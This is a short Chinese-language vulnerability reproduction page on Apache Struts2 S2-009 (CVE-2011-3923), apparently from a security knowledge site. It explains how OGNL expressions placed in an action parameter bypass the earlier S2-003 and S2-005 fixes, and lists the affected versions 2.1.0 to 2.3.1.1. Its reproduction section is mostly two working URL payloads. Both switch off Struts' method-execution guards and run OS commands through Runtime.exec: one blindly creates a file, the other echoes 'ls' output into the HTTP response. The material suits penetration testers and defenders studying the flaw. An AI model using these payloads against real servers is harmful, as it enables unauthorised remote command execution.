008-(CVE-2011-3923)s2-009

# (CVE-2011-3923)s2-009

## 一、漏洞简介

这个漏洞跟s2-003 s2-005 属于一套的。

Struts2对s2-003的修复方法是禁止`#`号,于是s2-005通过使用编码`\u0023`或`\43`来绕过;于是Struts2对s2-005的修复方法是禁止`\`等特殊符号,使用户不能提交反斜线。

但是,如果当前action中接受了某个参数`example`,这个参数将进入OGNL的上下文。所以,我们可以将OGNL表达式放在`example`参数中,然后使用`/HelloWorld.acton?example=&(example)(‘xxx’)=1`的方法来执行它,从而绕过官方对`#`、`\`等特殊字符的防

## 二、漏洞影响

2.1.0 – 2.3.1.1

## 三、复现过程

没回显

“`bash
/ajax/example5?age=12313&name=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27touch%20/tmp/success%27%29%29%28meh%29&z[%28name%29%28%27meh%27%29]=true

“`

有回显

“`bash
/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

“`

![图片.png](/static/lingzu/images/60dcac0d9fa449cda78bbd9f4db3fcab.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容